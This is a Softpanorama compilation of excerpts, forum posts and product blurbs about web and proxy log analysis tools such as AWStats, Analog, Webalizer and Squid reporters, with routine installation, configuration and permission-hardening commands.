Click here to download dailystats-3.0.tgz.

Installation/Usage

There is a README file in the archive you just downloaded, explaining how to install it and run it.

Licence
Perlfect Daily Stats is freely distributed under the GNU Public Licence.
W3Perl 3.13 is a web logfile analyzer. It can also read FTP, Squid, or mail logfiles. It allows most statistical data to be output with graphical and textual information. An administration interface is available to manage the package.
HowtoForge
Now that YUM has its additional repository, we are ready to install. From the command line type:
yum install awstats
Modify AWStats Apache Configuration:
Edit /etc/httpd/conf.d/awstats.conf. (Note: when you put your conf file in the /etc/httpd/conf.d/ folder it is automatically loaded as part of the Apache configuration; there is no need to add it again to httpd.conf. This setup is usually chosen for one of two reasons: it is a cleaner approach that separates different applications into their own configuration files, or you are in a hosted environment that does not allow direct editing of httpd.conf.)
Alias /awstats/icon/ /var/www/awstats/icon/
ScriptAlias /awstats/ /var/www/awstats/
<Directory /var/www/awstats/>
    DirectoryIndex awstats.pl
    Options ExecCGI
    order deny,allow
    allow from all
</Directory>
Alias /awstatsclasses "/var/www/awstats/lib/"
Alias /awstats-icon/ "/var/www/awstats/icon/"
Alias /awstatscss "/var/www/awstats/examples/css"

Note: the mod_cgi module must be loaded into Apache, otherwise Apache will serve awstats.pl as a plain file instead of executing it. This can be done in two ways: either enable it for the entire web server, or, using VirtualHosts, enable it just for AWStats.
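For instance, on a Red Hat style layout the module is typically loaded globally with a line like the following in the Apache configuration (the exact module path may differ on your system):

LoadModule cgi_module modules/mod_cgi.so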
Edit the following lines in the default awstats configuration file /etc/awstats/awstats.localhost.localdomain.conf:
SiteDomain="<server name>.<domain>"
HostAliases="<any aliases for the server>"

Rename the config file:
mv /etc/awstats/awstats.localhost.localdomain.conf /etc/awstats/awstats.<server name>.<domain>.conf
Update Statistics (Note: By default, statistics will be updated every hour.):
/usr/bin/awstats_updateall.pl now -confdir="/etc" -awstatsprog="/var/www/awstats/awstats.pl"
Start Apache:
/etc/init.d/httpd start
To automate startup of Apache on boot up, type
chkconfig --add httpd
Verify Install
Go to http://<server name>.<domain>/awstats/awstats.pl?config=<server name>.<domain>
Securing AWStats
Setting File System Permissions
The webserver needs only read-access to your files in order for you to be able to access AWStats from the browser. Limiting your own permissions will keep you from accidentally messing with files. Just remember that with this setup you will have to run perl to execute scripts rather than executing the scripts themselves.
$ find ./awstats -type d -exec chmod 701 '{}' \;
$ find ./awstats -not -type d -exec chmod 404 '{}' \;
Apache doesn't need direct access to the AWStats configuration files, so we can secure them tightly without affecting how the pieces work together. To ensure that your configuration files are not readable via the browser:
chmod 400 /etc/awstats/*.conf
Protecting The AWStats Directory With htpasswd And Adding .htaccess
Securing the AWStats folder(s) is a step-by-step process: make sure the awstats folder is owned by the user that needs access to it, create an htpasswd.users file, and add the corresponding .htaccess file to authenticate against it. Let's first secure the awstats folder by typing the following from the command line:
find ./awstats -type d -exec chmod 701 '{}' \;
find ./awstats -not -type d -exec chmod 404 '{}' \;
Now that our folders have been secured, we'll need to create the htpasswd.users file. Go to the /etc/awstats folder and execute the following command:
htpasswd -c /etc/awstats/htpasswd.users user
(Select whatever username you'd like.)
It'll ask you to add a password for the user you've selected; add it, re-type it for confirmation, and save. The final step is to create an .htaccess file pointing to the htpasswd file for authentication. Go to /var/www/awstats/ and create a new file called .htaccess using your favorite editor; nano and vi tend to be the more popular ones. In this example we'll use vi. From the command line type
vi .htaccess
An alternate method of creating an .htaccess file is using the Htaccess Password Generator. Add the following content to your newly created .htaccess file:
AuthName "STOP - Do not continue unless you are authorized to view this site! - Server Access" AuthType Basic AuthUserFile /etc/awstats/htpasswd.users Require valid-user htpasswd -c /etc/awstat/htpasswd.users awstats_onlineOnce done, secure the .htaccess file by typing:
chmod 404 awstats/.htaccess
open.itworld.com
Analog is a free web traffic analysis tool that prepares reports on activity on your web sites, including graphs that summarize hourly and daily activity, file size, file type, visiting site, return codes and numerous other statistics that illustrate how your web sites are being used. I recently compiled and deployed Analog on a couple of Solaris 9 servers. Today's column is a how-to on building Analog and a quick introduction to how it works.
To compile Analog on a Solaris system, you should first grab a copy of the source code. I went to http://www.analog.cx/download.html and downloaded analog-6.0.tar.gz. This command should work on the command line if you have wget installed:
wget http://www.analog.cx/analog-6.0.tar.gz
I then gunzipped and extracted the contents of the downloaded file and attempted to compile the application:
$ gunzip analog-6.0.tar.gz
$ tar xf analog-6.0.tar
$ cd analog-6.0
$ make
My attempt to compile Analog ran into some problems -- notably undefined symbols.
$ make
cd src && make
make[1]: Entering directory `/export/home/henrystocker/analog-6.0/src'
gcc -O2 -DUNIX -c alias.c
gcc -O2 -DUNIX -c analog.c
gcc -O2 -DUNIX -c cache.c
... omitted output ...
Undefined                       first referenced
 symbol                             in file
gethostbyaddr                       alias.o
inet_addr                           alias.o
ld: fatal: Symbol referencing errors. No output written to ../analog
collect2: ld returned 1 exit status
make[1]: *** [analog] Error 1
make[1]: Leaving directory `/export/home/henrystocker/analog-6.0/src'
make: *** [analog] Error 2

I soon figured out that I needed to make a small change to one of my Makefiles. I made the change with this perl command, adding the network services library after noting that the man pages for the undefined symbols both referenced -lnsl.

$ cd src
$ perl -i -p -e "s/LIBS = -lm/LIBS = -lnsl -lm/" Makefile

My LIBS line then looked like this:

LIBS = -lnsl -lm (added -lnsl)

After this change, Analog compiled without a hitch:

$ cd ..
$ make
cd src && make
make[1]: Entering directory `/export/home/shs/analog-6.0/src'
gcc -O2 -DUNIX -c alias.c
gcc -O2 -DUNIX -c analog.c
gcc -O2 -DUNIX -c cache.c
... omitted output ...
gcc -O2 -o ../analog alias.o analog.o cache.o dates.o globals.o hash.o init.o init2.o input.o macinput.o macstuff.o output.o output2.o outcro.o outhtml.o outlatex.o outplain.o outxhtml.o outxml.o process.o settings.o sort.o tree.o utils.o win32.o libgd/gd.o libgd/gd_io.o libgd/gd_io_file.o libgd/gd_png.o libgd/gdfontf.o libgd/gdfonts.o libgd/gdtables.o libpng/png.o libpng/pngerror.o libpng/pngmem.o libpng/pngset.o libpng/pngtrans.o libpng/pngwio.o libpng/pngwrite.o libpng/pngwtran.o libpng/pngwutil.o pcre/pcre.o zlib/adler32.o zlib/compress.o zlib/crc32.o zlib/deflate.o zlib/gzio.o zlib/infblock.o zlib/infcodes.o zlib/inffast.o zlib/inflate.o zlib/inftrees.o zlib/infutil.o zlib/trees.o zlib/uncompr.o zlib/zutil.o unzip/ioapi.o unzip/unzip.o bzip2/bzlib.o bzip2/blocksort.o bzip2/compress.o bzip2/crctable.o bzip2/decompress.o bzip2/huffman.o bzip2/randtable.o -lnsl -lm
make[1]: Leaving directory `/export/home/shs/analog-6.0/src'

$ ls -l analog
-rwxr-xr-x   1 root     other     577568 Mar 29 19:34 analog

Once Analog was compiled, I moved it into /usr/local/bin (there was no "make install" option) and ran a "make clean" to remove object files. At this point, I had switched over to root. The next step was setting up a configuration file to give Analog some directions on how I wanted it to work. Analog comes with example configuration files and there are numerous options that can be used to customize your reports, but I wanted to start with something simple, so I set up a handful of options and installed the file as /usr/local/bin/analog.cfg:
# cat > /usr/local/bin/analog.cfg << EOF
> LANGFILE usa.lng
> HOSTNAME boson.particles.org
> HOSTURL "http://boson.particles.org"
> DAILYSUM ON
> DAILYREP ON
> LOGFILE /opt/apache/logs/access_log
> OUTFILE /opt/apache/htdocs/webstats.html
> DOMAINSFILE usdom.tab
> EOF

I also had to create a directory named /usr/local/bin/lang and copy the usa.lng and usdom.tab files from my lang directory into it.

# mkdir /usr/local/bin/lang
# cp lang/usa.lng /usr/local/bin/lang
# cp lang/usdom.tab /usr/local/bin/lang

I then ran the report like this:

# analog /opt/apache/logs/access_log
My processed report appeared in my /opt/apache/htdocs directory along with four image files containing pie charts for some of my statistics. You can see a sample Analog report here.
Here's a list of features that you can turn off or on:

MONTHLY ON       # one line for each month
WEEKLY ON        # one line for each week
DAILYREP ON      # one line for each day
DAILYSUM ON      # one line for each day of the week
HOURLYREP ON     # one line for each hour of the day
GENERAL ON       # the General Summary at the top
REQUEST ON       # which files were requested
FAILURE ON       # which files were not found
DIRECTORY ON     # Directory Report
HOST ON          # which computers requested files
ORGANISATION ON  # which organisations they were from
DOMAIN ON        # which countries they were in
REFERRER ON      # where people followed links from
FAILREF ON       # where people followed broken links from
SEARCHQUERY ON   # the phrases and words they used...
SEARCHWORD ON    # ...to find you from search engines
BROWSERSUM ON    # which browser types people were using
OSREP ON         # and which operating systems
FILETYPE ON      # types of file requested
SIZE ON          # sizes of files requested
STATUS ON        # number of each type of success and failure
Download Internet Access Monitor for Squid free - 2.01 Mb
Internet Access Monitor is a comprehensive Internet use monitoring and reporting utility for corporate networks. The program takes advantage of the fact that most corporations provide Internet access through proxy servers, like MS ISA Server, WinGate, WinRoute, MS Proxy, WinProxy, EServ, Squid, Proxy Plus and others. Each time any user accesses a website or downloads files or images, these actions are logged. Internet Access Monitor processes these log files to offer system administrators a wealth of report building options. The program can build reports for individual users, showing the list of websites he or she visited, along with a detailed breakdown of internet activity (downloading, reading text, viewing pictures, watching movies, listening to music, working). Plus, the program can create comprehensive reports with analysis of overall bandwidth consumption, building easy to comprehend visual charts that suggest the areas where wasteful bandwidth consumption may be eliminated.
There are a lot of free http log file analysis tools out there that haven't been updated since the mid 90's; awstats, however, is both free and up to date. It looks a bit like WebTrends (though I haven't used WebTrends in several years). Here's an online demo. awstats can be used on several web servers including IIS and Apache. You can either have it generate static html files, or run it as a perl script in the cgi-bin.
Here's a quick rundown of setting it up on unix/apache
Each virtual web site you want to track stats for should have a file /etc/awstats.sitename.conf. The directives for the configuration file can be found here: http://awstats.sourceforge.net/docs/awstats_config.html. They also provide a default conf file in cgi-bin/awstats.model.conf; you can use this as a base.
Make sure your log files are using NCSA combined format. This is usually done in Apache by saying CustomLog /logs/access.log combined. You can use other formats, but then you have to customize the conf file.
You will probably want to edit the LogFile directive to point to where your logfile is stored. SiteDomain is the main domain for the site, HostAliases lets you put in other domains for the site, and the DirData directive lets you specify where the awstats databases will be stored (each site will have its own file in that directory).
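The exact values depend on your site, but a hypothetical fragment of awstats.sitename.conf using those four directives could look like this (the paths and domain names are placeholders, not defaults shipped with AWStats):
LogFile="/var/log/httpd/access_log"
SiteDomain="www.example.com"
HostAliases="example.com localhost 127.0.0.1"
DirData="/var/lib/awstats"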
Once that is set up, you will want to update the database. This is done from the command line by running:
perl awstats.pl -config=sitename -update
Now copy everything in the wwwroot folder to a web root, and visit http://sitename.com/cgi-bin/awstats.pl. If you want to view other domains use /cgi-bin/awstats.pl?config=othersitename
Where sitename would be the name of your config file awstats.sitename.conf
If you want to generate static html files, run the awstats_buildstaticpages.pl script found in the tools folder. You have to give it the path to the awstats.pl script, and a directory to put the static html files in:
perl awstats_buildstaticpages.pl -config=sitename -awstatsprog=/web/cgi-bin/awstats.pl -dir=/web/stats/sitename/
More setup info can be found here: http://awstats.sourceforge.net/docs/index.html
AWStats is a free, powerful and featureful tool that generates advanced web, ftp or mail server statistics, graphically. This log analyzer works as a CGI or from the command line and shows you all possible information your log contains, in a few graphical web pages. It uses a partial information file to be able to process large log files, often and quickly. It can analyze log files from IIS (W3C log format), Apache log files (NCSA combined/XLF/ELF log format or common/CLF log format), WebStar and most other web, proxy, wap and streaming servers, as well as mail servers (and some ftp servers).
Take a look at this comparison table for an idea on differences between most famous statistics tools (AWStats, Analog, Webalizer,...).
AWStats is a free software distributed under the GNU General Public License. You can have a look at this license chart to know what you can/can't do.
As AWStats works from the command line but also as a CGI, it can work with major web hosting providers that allow CGI and log access. You can browse the AWStats demo (the real-time feature to update stats from the web has been disabled on demos) to see a sample of the most important information AWStats shows you...
Squid2MySQL is an accounting system for squid. It includes monthly, daily, and timed detail levels, and uses MySQL for log storage.
Eugene V. Chernyshev <evc (at) chat (dot) ru> [contact developer]
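Squid2MySQL's own schema and scripts are available from the developer; to illustrate the general idea of pushing squid's native access.log into MySQL, here is a minimal Perl DBI sketch in which the database name, table, columns and credentials are all assumptions made up for the example:

#!/usr/bin/perl
# Sketch only: load squid native-format access.log entries into MySQL via DBI.
# The squid_access table, its columns and the credentials are illustrative,
# not Squid2MySQL's actual schema.
use strict;
use warnings;
use DBI;

my $dbh = DBI->connect('DBI:mysql:database=squidlog;host=localhost',
                       'squid', 'secret', { RaiseError => 1 });
my $sth = $dbh->prepare(
    'INSERT INTO squid_access (ts, client, bytes, url) VALUES (?, ?, ?, ?)');

open my $log, '<', '/var/log/squid/access.log' or die $!;
while (<$log>) {
    # native format: time elapsed client code/status bytes method URL ...
    my ($ts, undef, $client, undef, $bytes, undef, $url) = split ' ', $_, 8;
    next unless defined $url;
    $sth->execute(int $ts, $client, $bytes, $url);
}
close $log;
$dbh->disconnect;

With the rows in MySQL, the monthly, daily and per-client breakdowns become simple GROUP BY queries rather than repeated log scans.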
I'm looking for access log analysis software that will run independently from the ACS. Hopefully the thing would read an AOLserver or Apache access log and generate some graphs and tables in a configurable way. Any specific suggestions? The goal is usage analysis for marketing purposes (i.e., not performance analysis). Probably running on Solaris and it doesn't have to be freeware.
-- S. Y., August 29, 2000
I've been using webalizer (http://www.webalizer.com). It's real easy to set up and configure. For a sample of what it does, check out http://www.badgertronics.com/reports
-- Mark Dalrymple, August 29, 2000
And if you don't mind paying, NetTracker (from http://www.sane.com) has a ton of reports, handles big log files (a site we know that's using it has 600 meg daily access logs), handles cobranding, etc.
-- Mark Dalrymple, August 29, 2000
Nettracker rules! We've been using it for a couple of years now and everyone loves it. It has no knowledge of the ACS or its users, of course, so real clickstream tracking isn't really possible, but for basic log analysis with lots of information it's great.
-- Janine Sisk, August 29, 2000
I worked quite a while with NetAnalysis by the Boston-based company NetGen. It's database-backed log file analysis software, i.e. usually once per day you stuff your log file information into your db. This way you can keep track of your homepage's success over time. It also enables you to connect your webserver log information with information from other databases and come up with really powerful information. For example it has pretty damn good adaptors to Intershop and to Vignette StoryServer and you can implement your own adaptors with a Perl-based (soon to be Java) API. (Why do I know these adaptors are good? I made the one for Intershop work properly and I specified the one for my former company's Vignette StoryServer standard installation ;)
The software to run analysis on your log is very smartly configurable and you have good metrics and I was promised some really powerful metrics for a future release (that should be out as of now).
It runs on Solaris and you'll need Oracle and a pretty heavy machine (way bigger than your webserver usually).
Other products I know about are Accrue (used to be based on sniffing TCP/IP packets) and iDecide by Informix (has another name these days) that are db-backed as well. Oh, and then I once met with a Canadian company that use JavaScript to spy out some information about the client. It was probably the most expensive software regarding costs/line of code - tho they had very, very, very good metrics. You can head over to playboy.com and look for a JS call on their entry site ;)
regards Dirk
-- Dirk Gómez, August 30, 2000
I have had great success with 'analog' a free utility for log parsing and analysis. It can generate simple reports and also machine readable reports (good for DB backed summary generation). There is also a perl based package called 'Report Magic' which takes the machine readable output and makes pretty pictures and tables for you.
The problem with many log analysis tools is that they cannot be comprehensive and definitely cannot reflect the structure of your particular site, especially if it has 'interesting' mechanisms by which content is rendered: frames, multiple URLs for a given page, etc. Also, when you get ~1GB of log data a day, some just croak big time. In this case, rolling your own is one solution, which I have been implementing (using Perl, where regexps are your friend, and a DB) and which follows some of the principles discussed at ASJ/. It also allows for simple reporting on only the bits and pieces I feel necessary, and it stays quick with HUGE sets of data.
This is a good technique for allowing ad-hoc queries on data but make sure you have a reasonably hefty machine (Dual Xeon with 2GB RAM, 100GB RAID).
I guess if there is a package out there which is extensible and modular (plugin support as mentioned above) then that may also be quite useful.
It's important to define exactly what info is most important in analysing logs, otherwise you can open up a huge can of worms, i.e. mapping all relationships between everything, which, whilst interesting, is quite difficult and reasonably useless unless it is quick and can add value in some way.
Sorry if I've stated the obvious, just my $0.05
-- geoff webb, September 4, 2000
Look carefully before you choose NetTracker. It scans the log files and saves the data into its own flat file database. If you ever lose files or decide that you want to add another report, it needs to regenerate all of that data. For a month's worth of logs (the 600 MB+ logs referred to by Mark Dalrymple above), it can take 3+ days.
-- Doug Harris, September 11, 2000
page-stats.pl will examine the access log of an http daemon and search it for occurrences of certain references. These references are then counted and put into an HTML file that is ready to be displayed to the outside world as a "Page Statistics" page. Each page can be selected from the statistics page.
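page-stats.pl itself can be fetched from its distribution site; as a rough illustration of the same idea, the core of such a script can be as small as the following sketch, where the tracked page list and the output file name are hypothetical:

#!/usr/bin/perl
# Sketch: count hits for a hand-picked list of pages and emit an HTML table.
use strict;
use warnings;

my @tracked = ('/index.html', '/perl/index.shtml', '/downloads/');  # hypothetical list
my %hits = map { $_ => 0 } @tracked;

open my $log, '<', '/var/log/httpd/access_log' or die $!;
while (<$log>) {
    next unless m/"(?:GET|POST|HEAD) (\S+)/;
    # exact path match only; query strings and trailing slashes are ignored here
    $hits{$1}++ if exists $hits{$1};
}
close $log;

open my $out, '>', 'page-stats.html' or die $!;
print {$out} "<html><body><h1>Page Statistics</h1><table border=\"1\">\n";
print {$out} "<tr><td>$_</td><td>$hits{$_}</td></tr>\n"
    for sort { $hits{$b} <=> $hits{$a} } keys %hits;
print {$out} "</table></body></html>\n";
close $out;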
Big Brother Log Analyzer, or BBLA for short, is a package comprised of two components: a logger, which logs all accesses to selected web pages, and a log analyzer, which nicely formats the logs into an HTML page. The generated HTML is fully W3C compliant (HTML 4.01/Transitional), which guarantees that it will be rendered the way it should under any compliant browser. Another interesting feature of BBLA is that it is tag-based (you put a tag in each page you want to track): this allows for tracking pages hosted on different servers. For instance, I track accesses to my pages in the School of Information Management and Systems at the University of California, Berkeley, along with these pages hosted on SourceForge in a single file. See the demo for more information.
A lot of HTML log analyzers exist on the market, but most of them are either targeted at systems administrators (with full access to httpd log files, for instance), or require general users to display an advertising banner on their pages, or (even worse) limit the number of pages you can track for free. Most of the time, the pages generated do not even follow the W3C consortium recommendations for writing proper HTML, yielding unpredictable results when viewed with different browsers.
BBLA is free, doesn't require you to have a banner on your web page, uses W3C-compliant HTML and PNG images (hence, no licensing issues with GIFs), allows for tracking pages hosted on different servers, and is actually completely transparent. So, unless your visitors look into your HTML source, they won't notice that you are tracking them.
Last but not least, BBLA is extremely light-weight: the current tarball is roughly 30KB, making it much easier to install on platforms with scarce disk space than some of its counterparts. As an added bonus, it doesn't take ages to compile, even on really ancient hardware.
freshmeat.net
Relax is a multi-platform Web server log analyzer written in Perl. It can be used to track which search engines, search keywords, and referring URLs led visitors to the Web site. It can also track down bad links and analyze which keywords to bid for at pay-per-click search engines. The parser module in Relax recognizes several hundred search engines and is capable of extracting the keywords used. Generated HTML reports can be configured to include links to other Web-based keyword analysis tools, making it easier to further improve the ranking of web pages in search engines.
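Relax's parser recognizes several hundred engines; a bare-bones sketch of the underlying keyword extraction, assuming only that the engine passes the query in a q=, query= or p= parameter (true for some engines, certainly not all), might look like this:

#!/usr/bin/perl
# Sketch: pull search phrases out of referer URLs in a combined-format log.
use strict;
use warnings;

my %phrases;
while (<>) {
    # the referer is the second-to-last quoted field in combined format
    next unless m/"([^"]*)" "[^"]*"$/;
    my $ref = $1;
    # q=, query= and p= are common but engine-specific -- an assumption
    next unless $ref =~ m/[?&](?:q|query|p)=([^&]+)/;
    my $phrase = lc $1;
    $phrase =~ tr/+/ /;
    $phrase =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
    $phrases{$phrase}++;
}
printf "%5d  %s\n", $phrases{$_}, $_
    for sort { $phrases{$b} <=> $phrases{$a} } keys %phrases;

Feeding it an access log on the command line prints the search phrases ranked by frequency.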
freshmeat.net
proxy-report.pl generates a list of requested server addresses (simplified URLs) from your Squid proxy server log files. Requests for each URL are summarized on a per day basis. This script can generate reports based on the IP of the user. It also automatically handles gzipped files. URL exclusion patterns are supported. A sample report is available on the home page.
parses logfiles from Squid, NetCache, Inktomi Traffic Server,
O'Reilly Network
"In this column I'll give you a gentle introduction to Apache web server logs and their place in monitoring, security, marketing, and feedback."
stoic Freeware web server log analysis tool Jul 05th 1999, 05:52
stable: 1.2 - devel: none - license: Freeware
Stoic is a small Perl script that examines Apache or Netscape web server access logs. Reports include logfile totals, domains visiting, top documents requested, browser agent statistics, platform statistics and a bunch of other stuff.
Download: ftp://ftp.mrunix.net/pub/webalizer/
Alternate Download: ftp://samhain.unix.cslab.tuwien.ac.at/webalizer/
Homepage: http://www.mrunix.net/webalizer/
Changelog: ftp://ftp.mrunix.net/pub/webalizer/CHANGES
The Webalizer is a web server log analysis program. It is designed to scan web server log files in various formats and produce usage statistics in HTML format for viewing through a browser. Very good output, good charts and very fast. The only thing missing is a special mode for total statistics across all virtual webservers without that much detail.
Book chapters
freshmeat.net Browse project tree - Topic Internet Log Analysis
Google Directory - Computers Software Internet Site Management Log Analysis
Produces highly detailed, easily configurable, incremental HTML usage reports in many languages, from multiple log formats, with builds for Linux, Solaris, Mac, OS/2, Cobalt, OpenVMS, Netware, and BeOS. [Open Source, GPL]
WebStats - xenia - set of perl scripts and sqlite database for apache web log analysis
logmanage is a program which is designed to perform flexible management of web statistics for a variety of users and main server logs. In its current configuration it is designed to work with http-analyze but should work with any web stats program that takes log input on STDIN and can be configured for the output directory on the command line. Manages a large collection of pipes to the stats program with inclusion and exclusion regular expressions. Can generate stats for lots of different users from one log file or from many log files.
Recycle-logs is a logfile manager written in Perl that attempts to overcome the limitations of other system log utilities. File rotation and other customization is based on control information specified in one or several configuration files.
W3Perl is a Web logfile analyzer. All major Web stats are available (referrer, agent, session, error, etc.). Reports are fully customizable via configuration files, and there is an administration interface control available.
Webalizer The Webalizer is a fast, free web server log file analysis program. It produces highly detailed, easily configurable usage reports in HTML format, for easy viewing with a standard web browser.
The wwwstat program will process a sequence of HTTPd common logfile format (CLF) access_log files and output a log summary in HTML format suitable for publishing on a website.
The splitlog program will process a sequence of CLF (or CLF with a prefix) access_log files and split the entries into separate files according to the requested URL and/or vhost prefix.
Both programs are written in Perl and, once customized for your site, should work on any UNIX-based system with Perl 4.036, 5.002, or better.
Qiegang Long, formerly at UMass, has released a program called gwstat that takes the output from wwwstat and generates a set of graphs to illustrate your httpd server traffic by hour, day, week or calling country/domain.
A mailing list, now shut down, was created for discussion and support of wwwstat development.
Log Scanner was written to watch for anomalies in log files. Upon finding them, it can notify you in a variety of ways. It was designed to be very modular and configurable. Unlike most other log scanners, this one has more than single pattern matches. It will allow you to trigger notifications on multiple occurrences of one or several events.
Product | Platforms | Price | Vendor
FlashStats | Mac, Unix, Windows | $99/$249 | Maximized Software
HTTP-Analyze | Unix, Windows | free / 326 euro / 388 euro / 1470 euro | http://www.http-analyze.org/
Lumberjack | Unix | $1250 | BitWrench Inc
NetTracker | Unix, Windows | from $495 | Sane Solutions
WebTrends | Windows, Solaris, Red Hat | $499 - $1999 | NetIQ
Sawmill | Mac, Unix, Windows | $999 (substantial discounts for edu & small organisations) | sawmill.net
Web Trends -- actually a pretty limited commercial package. Decent prepackaged reporting capabilities, but not very flexible (reports for dummies)
EasyLog version 1.2
This is a simple Server Side Includes script that can "watch" a given page and add entries to an HTML file reporting what browser visitors are using, when they accessed your page, and a few other pieces of information.
Language: Perl Platform: Unix
View Product Homepage
Checklog version 1.0
Perl script that analyzes HTTP server logs.
Language: Perl Platform: Unix, Windows
Download Complete Source Code, 0.010M bytes
Click file name to view online:
checklog.pl,
14504 bytes
FTPWebLog version 1.0.3
Perl script that analyses WWW and FTP logs and produces graphical reports.
Language: Perl Platform: Unix, Windows
Download Complete Source Code, 0.096M bytes
Relax version 2.0
Relax is a free reference log analysis program written in Perl, which can be used to analyse how people
are finding your web site, what keywords they use in the search engines, and how they move within the
site.
Language: Perl Platform: Unix, Windows
Download Complete Source Code, 0.010M bytes
Log Reverse Domain Name System (lrdns) version 1.1 -- Converts numeric IP addresses in access log files into textual domain names. Language: Perl Platform: Unix
Download Complete Source Code, 0.010M bytes
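In the same spirit as lrdns (this is not its code), a short Perl sketch using the core Socket module can resolve each distinct IP in a log exactly once, which is far cheaper than resolving every line:

#!/usr/bin/perl
# Sketch: resolve each distinct IP in an access log once, then print a mapping.
use strict;
use warnings;
use Socket qw(inet_aton AF_INET);

my %seen;
while (<>) {
    $seen{$1} = 1 if m/^(\d+\.\d+\.\d+\.\d+)\s/;
}
for my $ip (sort keys %seen) {
    my $name = gethostbyaddr(inet_aton($ip), AF_INET);
    printf "%-15s %s\n", $ip, defined $name ? $name : '(no PTR record)';
}

Run it with the access log as an argument and it prints an IP-to-hostname table you can join back against the log when needed.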
The Last but not Least: Technology is dominated by two types of people: those who understand what they do not manage and those who manage what they do not understand. ~Archibald Putt, Ph.D.
Copyright © 1996-2021 by Softpanorama Society. www.softpanorama.org was initially created as a service to the (now defunct) UN Sustainable Development Networking Programme (SDNP) without any remuneration. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License. Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.
FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available to advance understanding of computer science, IT technology, economic, scientific, and social issues. We believe this constitutes a 'fair use' of any such copyrighted material as provided by section 107 of the US Copyright Law according to which such material can be distributed without profit exclusively for research and educational purposes.
This is a Spartan WHYFF (We Help You For Free) site written by people for whom English is not a native language. Grammar and spelling errors should be expected. The site contains some broken links as it develops, like a living tree...
Disclaimer:
The statements, views and opinions presented on this web page are those of the author (or referenced source) and are not endorsed by, nor do they necessarily reflect, the opinions of the Softpanorama society. We do not warrant the correctness of the information provided or its fitness for any purpose. The site uses AdSense, so you need to be aware of Google's privacy policy. If you do not want to be tracked by Google, please disable Javascript for this site. This site is perfectly usable without Javascript.
Last modified: January 09, 2020